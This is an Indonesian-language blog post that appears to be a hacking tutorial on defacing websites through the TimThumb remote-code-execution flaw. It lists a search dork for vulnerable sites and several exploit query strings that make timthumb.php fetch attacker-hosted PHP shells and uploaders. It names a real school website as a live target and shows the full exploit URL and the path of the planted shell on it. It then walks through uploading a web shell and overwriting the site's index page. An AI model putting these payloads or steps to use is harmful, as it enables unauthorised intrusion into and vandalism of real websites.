DEFACE TIMTHUMB RCE
Kuy Kali Ini Kita Bahas Deface Dengan Metode Timthumb RCE
Pertama" Siapkan Dorknya Ama Exploitnya .. (Exploitnya Beda Beda Gan.. Kita Tinggal Liat
Versinya dolo ea:<)..
Versinya dolo ea:<)..
- Drok : inurl:timthumb.php?src= (selebihnya kembangin yah)
- Exploit :
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php (private shell versi 1.30)
?scr=http://flickr.com.x-groups.org/Nur.php (versi 1.20 kebawah)
Sudah diuji coba oleh android by Nurmala And W3LL SQUAD Passnya 22 ok :)
?src=http://picasa.com.sp-exploiter.xyz/timthumb/a.php (uploader versi 1.9)
?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php (private shell versi 1.30)
?scr=http://flickr.com.x-groups.org/Nur.php (versi 1.20 kebawah)
Sudah diuji coba oleh android by Nurmala And W3LL SQUAD Passnya 22 ok :)
Live Target :
http://mamnonsunrise.edu.vn
Pertama Kita Dork Dulu Digoogle Dulu :(
Berhubung Gw Udh Ada Targetnya Langsung Aja Gan Kita Sikat:(..
Lah Keluar Versinya Kan?? Kuy Tinggal Tambahkan Exploit 1.30
http://mamnonsunrise.edu.vn/timthumb.php?src=http://flickr.com.thanhnam102.com/M4ni4kCyberTeam.php
Kemudian Kita Copy Mulai Dari ./cache sampek php contohnya :
http://mamnonsunrise.edu.vn/cache/external_766fc9ebc1c710f9dda399c2256bea00.php
kemudian pasti akan ada tempat upload shellnya
Pilih shell kalian terus upload,,
Kemudian Cari Index.html Atau Index.php... Trs kalian Edit Dan Tumpuk Dengan Script Deface
kalian.. Dan Otomatis web sudah ketebas:v... Kalau kalian Baik Jangan lupa Backup Dulu indexnya,, Kasian Adminnya Vvq:v,,,,
OK SAMPEK SINI DULU YA,, CHAT GW AJA 083831973261,, HWHWHW;v
0 komentar:
Posting Komentar